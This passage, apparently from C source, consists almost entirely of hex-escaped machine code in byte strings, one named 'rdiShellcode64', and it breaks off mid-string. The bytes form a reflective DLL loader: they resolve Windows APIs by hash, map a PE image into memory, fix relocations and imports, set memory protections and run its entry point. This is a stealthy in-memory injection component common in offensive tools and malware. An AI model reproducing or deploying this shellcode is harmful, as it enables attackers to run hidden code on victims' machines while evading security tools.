\x4C\x24\x79\x88\x8C\x24\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24\x72\x69\x76\xC7\x44\x24\x75\x53\x
79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x49\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x3D\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x38\x50\x55\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x44\x24\x38\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x5C\x89\x44\x24\x14\x8D\x84\x24\xB8\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x14\x8D\x84\x24\xBC\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24\x6C\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x3C\x89\x44\x24\x14\x8D\x84\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xB4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x39\x6C\x24\x38\x0F\x84\xD2\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00\x0F\x84\xC5\x06\x00\x00\x
39\xAC\x24\xB0\x00\x00\x00\x0F\x84\xB8\x06\x00\x00\x39\xAC\x24\xBC\x00\x00\x00\x0F\x84\xAB\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\x9C\x06\x00\x00\x8B\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\x84\x06\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\x75\x06\x00\x00\x8B\x46\x38\xA8\x01\x0F\x85\x6A\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x28\x03\xCE\x83\x79\x04\x00\x8B\x39\x74\x03\x8B\x41\x04\x03\xC7\x3B\xC3\x0F\x46\xC3\x83\xC1\x28\x8B\xD8\x8B\x46\x38\x83\xEA\x01\x75\xE1\x8B\xBC\x24\x28\x01\x00\x00\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2\x3B\xE8\x0F\x85\x04\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24\x48\x8B\xD8\x89\x5C\x24\x30\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54\x24\x48\x8B\xD8\x89\x44\x24\x30\xF6\x84\x24\x3C\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24\x18\x33\xC0\x89\x6C\x24\x24\x0F\xB7\x75\x14\x83\xC6\x28\x66\x3B\x45\x06\x73\x3E\x03\xF5\x83\x64\x24\x20\x00\x83\x3E\x00\x76\x22\x8B\x6C\x24\x20\x8B\x46\x04\x8D\x14\x2B\x8B\x4E\xFC\x03\xC5\x45\x8A\x04\x38\x88\x04\x0A\x3B\x2E\x72\xEA\x8B\x6C\x24\x24\x8B\x4C\x24\x18\x0F\xB7\x45\x06\x41\x83\xC6\x28\x89\x4C\x24\x18\x3B\xC8\x72\xC4\x8B\xC3\x2B\x45\x34\x89\x44\x24\x20\x0F\x84\xB8\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xAB\x00\x00\x00\x8B\xB5\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\x9A\x00\x00\x00\x8B\xE8\x8D\x7E\x08\xEB\x74\x0F\xB7\x0F\x66\x8B\xC1\x0F\xB7\xD1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x20\x8B\x16\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x20\x8D\x04\x1A\x8B\x0C\x08\x8D\x04\x1A\x8B\x54\x24\x20\x03\xCD\x89\x0C\x10\x
EB\x3C\x66\x83\xF8\x03\x75\x0F\x8B\x06\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x2C\x02\xEB\x27\x33\xC9\x41\x66\x3B\xC1\x75\x07\x8B\xC5\xC1\xE8\x10\xEB\x0B\x6A\x02\x59\x66\x3B\xC1\x75\x10\x0F\xB7\xC5\x8B\x0E\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x04\x0A\x6A\x02\x58\x03\xF8\x8B\x46\x04\x03\xC6\x3B\xF8\x75\x83\x83\x3F\x00\x8B\xF7\x0F\x85\x73\xFF\xFF\xFF\x8B\x6C\x24\x24\x8B\xBC\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xEF\x01\x00\x00\x8B\xB5\x80\x00\x00\x00\x33\xC0\x89\x84\x24\xAC\x00\x00\x00\x8D\x0C\x1E\x89\x4C\x24\x20\x83\xC1\x0C\x39\x01\x74\x10\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x84\x24\xAC\x00\x00\x00\xF6\x84\x24\x3C\x01\x00\x00\x04\x8B\xD6\x0F\x84\xCF\x00\x00\x00\x33\xC9\x41\x3B\xC1\x0F\x86\xC4\x00\x00\x00\x8B\x8C\x24\x3C\x01\x00\x00\x8D\x50\xFF\x83\xA4\x24\xC0\x00\x00\x00\x00\x89\x54\x24\x28\x8B\xD6\xC1\xE9\x10\x8D\x70\xFF\x89\x4C\x24\x18\x85\xF6\x0F\x84\xA2\x00\x00\x00\x8B\x74\x24\x20\x8B\xDE\x8B\xAC\x24\xC0\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x84\x24\xAC\x00\x00\x00\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01\x00\x00\x83\xC3\x14\x8B\x74\x24\x20\x3B\x6C\x24\x28\x72\x87\x8B\x6C\x24\x24\x8B\x5C\x24\x30\x8B\x4C\x24\x18\x8B\x95\x80\x00\x00\x00\xEB\x08\x8B\x4C\x24\x28\x89\x4C\x24\x18\x8D\x3C\x1A\x8B\x57\x0C\x89\x7C\x24\x30\x85\xD2\x0F\x84\xC9\x00\x00\x00\x8B\xC1\x23\x84\x24\x3C\x01\x00\x00\x83\xE0\x04\x89\x84\x24\xC0\x00\x00\x00\x8D\x04\x1A\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB\x8B\x0E\x85\xC9\x74\x5A\x8B\x7C\x24\x34\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB\x30\x83\xC1\x02\x33\xC0\x03\xCB\x89\x4C\x24\x28\x38\x01\x74\x0B\x40\x41\x80\x39\x00\x75\xF9\x8B\x4C\x24\x28\x55\x
66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x4C\x24\x1C\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xAE\x8B\x7C\x24\x30\x83\xBC\x24\xC0\x00\x00\x00\x00\x74\x1C\x33\xC0\x40\x39\x84\x24\xAC\x00\x00\x00\x76\x10\x69\x44\x24\x18\xE8\x03\x00\x00\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\x57\x20\x83\xC7\x14\x89\x7C\x24\x30\x85\xD2\x0F\x85\x4E\xFF\xFF\xFF\x8B\x6C\x24\x24\x83\xBD\xE4\x00\x00\x00\x00\x6A\x20\x5A\x0F\x84\xAF\x00\x00\x00\x8B\x85\xE0\x00\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x18\x8B\x00\x85\xC0\x0F\x84\x96\x00\x00\x00\x8B\x6C\x24\x18\x03\xC3\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x34\x8B\x17\x85\xD2\x79\x09\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x28\x38\x02\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x28\x56\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x54\x24\x1C\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x18\x6A\x20\x5A\x03\xEA\x89\x6C\x24\x18\x8B\x45\x00\x85\xC0\x0F\x85\x72\xFF\xFF\xFF\x8B\x6C\x24\x24\x0F\xB7\x75\x14\x33\xC0\x83\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\x81\x00\x00\x00\x03\xF5\x83\x3E\x00\x74\x6B\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x40\xF7\xC1\x00\x00\x00\x20\x75\x18\x85\xC0\x75\x0D\x6A\x08\x58\x6A\x01\x85\xC9\x59\x0F\x49\xC1\xEB\x1D\x6A\x04\x58\x6A\x02\xEB\xF1\x85\xC0\x75\x0A\x6A\x10\xB8\x80\x00\x00\x00\x5A\xEB\x03\x6A\x40\x58\x85\xC9\x0F\x49\xC2\x89\x44\x24\x2C\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89\x44\x24\x2C\x8D\x4C\x24\x2C\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC8\x00\x00\x00\x0F\xB7\x45\x06\x47\x83\xC6\x28\x6A\x20\x5A\x3B\xF8\x72\x81\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC8\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\x
C0\x75\xF1\x8B\x6C\x24\x24\x33\xC0\x40\x50\x50\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xC3\x00\x00\x00\x83\x7D\x7C\x00\x0F\x84\xB9\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84\xA9\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x9F\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB\x83\x64\x24\x34\x00\x03\xCB\x85\xED\x0F\x84\x88\x00\x00\x00\x8B\x37\x6A\x00\x58\x89\x44\x24\x18\x03\xF3\x74\x7B\x8A\x06\x84\xC0\x74\x2B\x8B\x6C\x24\x18\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x18\x8B\x44\x24\x18\x8B\x6A\x18\x39\x84\x24\x2C\x01\x00\x00\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x34\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24\x34\x3B\xC5\x72\xAF\xEB\x35\x0F\xB7\x09\x8B\x42\x1C\x8D\x04\x88\x8B\x04\x18\x03\xC3\xF6\x84\x24\x3C\x01\x00\x00\x08\x74\x0B\x6A\x04\xFF\xB4\x24\x3C\x01\x00\x00\xEB\x0E\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4\x24\x34\x01\x00\x00\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB";
110 | LPSTR rdiShellcode64 = "\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF\xC7\x45\xD0\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D\xC8\x44\x8B\xEA\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C\x89\x7D\x00\x4C\x89\x7D\xE8\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x24\xC7\x45\xD4\x72\x00\x6E\x00\xC7\x45\xD8\x65\x00\x6C\x00\xC7\x45\xDC\x33\x00\x32\x00\xC7\x45\xE0\x2E\x00\x64\x00\xC7\x45\xE4\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x64\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x48\x8B\xD8\xE8\x57\x08\x00\x00\x4C\x8B\xE0\x48\x89\x45\xF0\x48\x8D\x45\xD0\xC7\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xC8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x00\xC7\x44\x24\x20\x0E\x00\x0E\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\xC7\x44\x24\x20\x15\x00\x15\x00\x48\x8B\x4C\x24\x38\x48\x
8D\x45\xA8\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x08\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x10\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xE8\xC7\x44\x24\x20\x05\x00\x05\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x18\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xF8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x4C\x39\x7D\xC8\x0F\x84\x03\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\xF9\x06\x00\x00\x4C\x39\x7D\xE8\x0F\x84\xEF\x06\x00\x00\x4C\x39\x7D\x08\x0F\x84\xE5\x06\x00\x00\x4C\x8B\x4D\x10\x4D\x85\xC9\x0F\x84\xD8\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50\x45\x00\x00\x0F\x85\xC5\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xB6\x06\x00\x00\x44\x8B\x47\x38\x45\x8D\x5F\x01\x45\x84\xC3\x0F\x85\xA5\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x29\x44\x0F\xB7\x57\x06\x48\x03\xCF\x8B\x41\x04\x8B\x11\x85\xC0\x75\x06\x41\x8D\x04\x10\xEB\x02\x03\xC2\x3B\xC3\x0F\x46\xC3\x48\x83\xC1\x28\x8B\xD8\x4D\x2B\xD3\x75\xDF\x48\x8D\x4D\x38\x41\xFF\xD1\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x32\x06\x00\x00\x48\x8B\x4F\x30\x41\xB9\x04\x00\x00\x00\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8\x48\x85\xC0\x75\x15\x44\x8D\x48\x04\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B\xD8\x41\xBB\x01\x00\x00\x00\x44\x84\x9D\xD8\x00\x00\x00\x74\x1D\x8B\x46\x3C\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x
03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39\xBF\x94\x00\x00\x00\x0F\x84\x9B\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x8B\x85\xD8\x00\x00\x00\x45\x8B\xE7\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x8E\x00\x00\x00\x45\x3B\xEB\x0F\x86\x85\x00\x00\x00\x44\x8B\xA5\xD8\x00\x00\x00\x45\x8D\x5D\xFF\x41\xC1\xEC\x10\x45\x8B\xD7\x45\x85\xDB\x74\x6E\x4D\x8B\xC8\x41\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x
10\x41\x0F\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xBC\x00\x00\x00\x8B\x7D\xC0\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x65\x48\x8B\x7D\xF0\x48\x85\xC9\x79\x08\x45\x0F\xB7\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x28\x45\x33\xC0\x48\x8D\x54\x24\x20\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4D\x8B\xCF\x49\x8B\xCA\xFF\xD7\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA2\x8B\x7D\xC0\x45\x33\xFF\x45\x85\xE4\x74\x14\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xE8\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x4B\xFF\xFF\xFF\x48\x8B\x7D\x30\x44\x8B\xAD\xB8\x00\x00\x00\x4C\x8B\x65\xF0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xB9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49\x83\xC7\x04\x4C\x03\xFB\x41\x8B\x07\x85\xC0\x0F\x84\x9D\x00\x00\x00\x41\xBD\x20\x00\x00\x00\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C\x48\x03\xF3\x4C\x03\xF3\x48\x83\x3E\x00\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7\xC2\x33\xD2\xEB\x33\x4C\x8D\x43\x02\x33\xC0\x4C\x03\xC2\x41\x38\x00\x74\x0E\x49\x8B\xD0\x48\xFF\xC2\x48\xFF\xC0\x80\x3A\x00\x75\xF5\x4C